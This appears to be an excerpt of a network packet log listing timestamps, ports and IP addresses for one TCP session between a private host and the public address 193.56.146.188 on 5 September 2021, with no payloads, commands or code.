Sep 5, 2021 15:50:11.610692978 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610733032 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610750914 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610786915 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610829115 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610841990 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610887051 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610938072 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610939026 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610992908 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611032009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611047983 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.611088037 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611140966 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.611179113 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611221075 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611257076 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611279011 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.611319065 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611358881 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611377001 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.611421108 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611463070 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611476898 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.611519098 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611558914 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611573935 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.611613989 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611654043 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611670017 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.611709118 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611747980 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611764908 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.611810923 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611852884 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611862898 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.611907959 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611947060 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.611963034 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612004042 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612041950 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612057924 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612098932 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612138987 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612154961 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612200022 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612245083 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612255096 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612298012 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612339973 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612355947 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612396002 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612436056 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612452030 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612492085 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612531900 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612576008 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612586021 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612632990 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612665892 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612685919 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612730980 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612747908 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612786055 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612823963 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612840891 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612879038 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612919092 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.612935066 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.612981081 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613020897 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613037109 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613076925 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613116026 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613132954 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613172054 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613209963 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613226891 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613265038 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613307953 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613325119 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613368988 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613409996 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613428116 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613464117 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613502979 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613523006 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613558054 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613596916 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613612890 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613652945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613692045 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613706112 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613750935 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613792896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613806009 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613847017 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613887072 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613898993 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.613941908 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613979101 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.613995075 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614033937 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614074945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614090919 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614135981 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614176989 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614197969 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614232063 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614274025 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614285946 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614331961 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614371061 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614392042 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614417076 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614427090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614470959 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614484072 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614522934 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614533901 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614583015 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614590883 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614639044 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614641905 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614691973 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614695072 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614748001 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614751101 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614801884 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614803076 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614856958 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614860058 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614911079 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.614913940 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614965916 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.614972115 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615024090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615030050 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615077972 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615077972 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615134001 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615155935 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615201950 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615212917 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615259886 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615259886 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615314007 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615319014 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615370035 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615370989 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615422010 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615422964 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615475893 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615479946 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615534067 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615539074 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615591049 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615593910 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615644932 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615644932 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615699053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615704060 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615751982 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615767956 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615809917 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615813017 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615863085 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615873098 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615923882 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.615927935 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615981102 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.615987062 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616034985 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616038084 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616086006 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616103888 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616142988 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616143942 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616198063 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616202116 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616251945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616254091 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616303921 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616321087 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616359949 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616369009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616416931 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616429090 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616472960 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616480112 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616528988 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616533041 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616581917 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616602898 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616636038 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616647959 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616691113 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616695881 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616741896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616764069 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616791964 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616801977 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616848946 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616862059 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616904020 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.616906881 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616956949 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.616961956 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.617010117 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.617012978 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.617063999 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.617069006 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.617119074 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.617120028 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.617171049 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.617172956 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.617223978 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.617229939 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.617279053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.617286921 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.617345095 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.618678093 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.618721962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.618751049 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.618769884 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.618782997 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.618834019 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.618840933 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.618884087 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.618891001 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.618938923 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.618943930 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.618994951 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.618995905 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.619049072 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.619050026 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.619102001 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.619106054 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.619155884 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.619188070 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.619229078 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.619242907 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.619287014 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.619513035 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.622435093 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.689661980 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.689718008 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.689775944 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.689778090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.689801931 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.689836979 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.689838886 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.689893007 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.689915895 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.689949036 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.689949989 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690004110 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690009117 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690058947 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690062046 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690112114 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690119982 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690166950 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690171003 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690226078 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690227032 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690278053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690293074 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690336943 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690337896 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690387011 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690423012 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690434933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690450907 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690489054 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690510035 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690546036 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690557003 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690603971 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690609932 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690661907 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690664053 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690715075 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690726042 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690769911 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690773010 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690829039 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690846920 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690886021 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690895081 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690943003 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.690948009 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.690998077 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691000938 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691051960 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691055059 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691108942 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691149950 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691193104 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691204071 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691248894 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691265106 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691313982 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691317081 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691366911 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691384077 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691423893 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691423893 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691482067 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691499949 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691539049 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691549063 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691595078 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691597939 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691653013 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691656113 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691709042 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691715002 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691761017 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691766977 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691813946 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691817045 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691869020 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691884995 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691921949 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.691937923 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691978931 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.691981077 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692028999 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692039013 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692087889 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692109108 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692146063 CEST	487	49723	193.56.146.188	192.168.2.4
